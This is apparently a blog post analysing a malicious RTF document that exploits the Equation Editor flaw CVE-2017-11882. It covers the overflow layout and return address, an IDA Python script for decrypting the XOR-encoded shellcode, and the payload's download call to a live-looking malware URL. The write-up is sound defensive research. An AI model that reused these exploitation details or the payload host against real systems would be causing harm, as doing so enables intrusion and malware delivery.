Two weeks ago a malicious MS Word document was blocked from a sandbox (SHA 256 — 1aca3bcf3f303624b8d7bcf7ba7ce284cf06b0ca304782180b6b9b973f4ffdd7).The sample looked interesting because by that time, VirusTotal had a limited detection rate. Both VirusTotal and Any.Run identified the sample as CVE-2017–11882, one of the infamous Equation Editor exploits. Let’s take a look.
Looking for an OLE
RTF is a quite complex structure by it self. On top of that, adversaries add additional obfuscation layers to prevent both analysts and various analysis tools to detect the malicious objects.
Firing up oletools/rtfobj and Didier’s rtdump, looking for OLE objects did not result to anything useful.
You can find a list about RTF obfuscation in the links below:
Unfortunately those didn’t help to find an OLE object, so we just looked for “d0cf” (OLE Compound header identifier) where one instance came up
Analyzing the OLE
Apparently this OLE object has a CLSID of “0002ce02–0000–0000-c000–000000000046” which indicates that the OLE object is related to Equation Editor and to the exploit itself. Additionally one OLE Native Stream was identified (instead of an Equation Native stream).
How OLE Native Stream is related? Cofense has posted a relevant article.
The OLENativeStream is an OLE2.0 stream object contained within an OLE Compound File Storage (MS-CFB) object and contains only one header field, a 4-byte NativeDataSize field
Return to stack
The native stream is 0x795 (1945)bytes long. After that offset the actual content follows. One can guess, that the next 4 bytes, starting from 02 AB 01 E7 are related to Equation Editor MTEF header (given that no Equation Native Stream exists). You can find a good analysis of MTEF here. The header consists of 5 bytes, where the first one should be 0x03. Apparently the MTEF header does not play an important role (Or not?). In addition, there are two extra bytes (0xA, 0x1) which do not map on the MTEF specification. If anyone knows how to interpret those bytes please illuminate me.
The most important part is the Font Record which have an ID of 0x8 and two one byte identifiers, one for typeface number an one for style (0x9D and 0x7C respectively). Following this byte sequence, the actual font name follows. Font name is stored in a buffer of 40 bytes length; 8 more are needed in order to overwrite the return address, which in our case is 0x00402157. This address belongs to a ret instruction in EQNEDT32.exe
It is well known, that this specific exploit is a stack-based buffer overflow. Our bet is that after the ret instruction, the execution returns to our shellcode. Let’s fire up Windbg.
Prior to the ret instruction the last element in stack is our shellcode (0x0018f354). After the ret command this value will be popped to eip. We can see in the disassembly windows that we have a very clean shellcode.
Analyzing the shellcode
In order to analyze the shellcode I used shellcode2exe and fired IDA. The first call is the 0x004667b0 which is the import address of GlobalLock function call in EQNEDT32.exe which locks our shellcode in memory.
Following a sequence of jmp instructions, we end up in a xor decryption loop. The xor decryption takes place in 0x3FE offset for 0x389 length. In order to help us with the decryption, a small IDA Python script was created (forgive any Python mistakes, Python n00b here). The script can be executed by selecting the desired offset and typing run() in console line in IDA.
from binascii import hexlify import struct import ctypes from ctypes import * def run(): startPos = 0x4013fe xored = 0 index = 0 for index in range (startPos,startPos + 0x389, 4): xored = xored * 0x22A76047 xored = xored + 0x2698B12D for i in range (0,4): patched_byte = ord(struct.pack('<I',c_uint(xored).value)[i]) ^ Byte(index+i) PatchByte(index+i, patched_byte)
After the execution of the script, a URL appeared, therefore something good happened to us.
In the decryption loop the is a call in sub_40147e which before the decryption was meaningless, as the jmp destination was out of range.
However the same function, after the decryption is totally different. You can observe a lot of dynamic call instructions, which one can bet that they are function pointers resolved by GetProcAddress
In order not to make the post huge and being lazy enough to continue static analysis, Windbg came into the scene. Apparently what the shellcode does, can be summarized in the following steps:
- URLDownloadToFileW(“ http://reggiewaller.com/404/ac/ppre.exe”,dst_path)
That’s all folks! This post and any following ones are simply a notepad, which document some basic analysis steps. Any comments or corrections are more than welcome.
In the above we presented an analysis of a malicious RTF detected by a sandbox. The RTF was exploiting the CVE-2017–11882. We tried to analyze the RTF, extracted the shellcode and analyzed it. The shellcode is a plain download & execute shellcode.